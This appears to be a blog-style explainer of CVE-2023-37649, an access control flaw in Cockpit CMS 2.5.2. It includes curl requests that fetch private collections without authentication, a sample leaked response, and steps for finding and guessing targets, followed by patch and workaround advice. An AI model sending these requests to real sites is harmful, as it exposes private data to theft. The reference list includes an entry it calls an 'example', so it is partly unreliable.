Cockpit CMS is a popular, headless content management system (CMS) widely embraced by developers building flexible, API-powered websites and apps. But sometimes, even flexible power comes with serious vulnerabilities.
In the summer of 2023, researchers uncovered a severe security flaw in Cockpit CMS version 2.5.2: CVE-2023-37649. This bug lets unauthorized attackers poke around in private data—*even if they shouldn’t have access*.
Let’s break down what went wrong, how it can be exploited, and how to protect yourself.
Type: Incorrect access control
- Component: /models/Content
Product: Cockpit CMS v2.5.2
- Impact: Unauthenticated (unauthorized) users can access sensitive data via API endpoints, bypassing permissions and authentication.
In plain English: Attackers can grab private data just by sending the right request to the server.
How the Flaw Works
Cockpit CMS lets you store and manage content in collections. Each collection might be public or protected. But, a flaw in the handling of requests means that anyone can fetch data from collections—even those requiring authentication—if they know the right URL and request format.
This is due to missing or weak permission checks in the API’s /models/Content logic.
The Problem in Code
Although the source code for Cockpit CMS is open, here’s a simplified version of what’s happening behind the scenes (for educational purposes):
// (Pseudo-code simplified for clarity)
public function find($collection, $options = []) {
// Missing: Authentication & permission checks!
$data = $this->storage->find($collection, $options);
return $data;
}
Normally, there should be a check like this
// Secure version
if (!$this->user->hasAccess($collection)) {
throw new UnauthorizedException('Access denied');
}
But in Cockpit CMS v2.5.2, the default API endpoint /api/collections/get/{collection} fails to enforce this strictly for the affected component.
How An Attacker Gets In
Suppose your Cockpit CMS website contains a private collection called supersecret intended only for administrators.
An attacker can simply fire off a request like this
curl -X POST \
http://your-cockpit-site.com/api/collections/get/supersecret \
-H 'Content-Type: application/json' \
-d '{}'
Expected: The server should deny access.
Actual: The server replies with a juicy JSON dump of your private supersecret collection!
Here’s a response you might see
{
"entries": [
{ "title": "API Key", "value": "123456789abcdef" },
{ "title": "Admin Notes", "value": "Use special credentials" }
],
"total": 2
}
Yikes! Anyone can collect sensitive site data with zero authentication.
Find a Vulnerable Cockpit CMS (v2.5.2) Instance: Use search engines or scanning tools.
2. Identify a Collection Name: Try guessing common ones (users, admin, secret, etc.), or fingerprint collection names from public references.
curl -X POST \
http://victim.com/api/collections/get/secret \
-H 'Content-Type: application/json' \
Mitigation and Patches
The Cockpit CMS team acted on this report and patched the issue in newer releases.
If you use Cockpit CMS v2.5.2:
- Upgrade immediately! Download the latest secure version here: Cockpit CMS Releases (GitHub)
Temporary Workaround:
If you absolutely must use an old version, use web server rules (.htaccess, nginx config) to restrict access to /api/collections/get/* to trusted IPs or behind authentication.
References
- NVD Entry for CVE-2023-37649
- Cockpit CMS GitHub Repository
- Original Report on Exploit-DB
- Security Advisory, CockpitHQ/Cockpit#1823 *(example, for updates and discussion)*
Conclusion
CVE-2023-37649 is a strong reminder that skipping even basic access control checks turns any sophisticated system into an open book for attackers. If you use Cockpit CMS, ensure you always run the latest version, and audit your API endpoints for unexpected exposure.
Timeline
Published on: 07/20/2023 20:15:00 UTC
Last modified on: 07/26/2023 16:18:00 UTC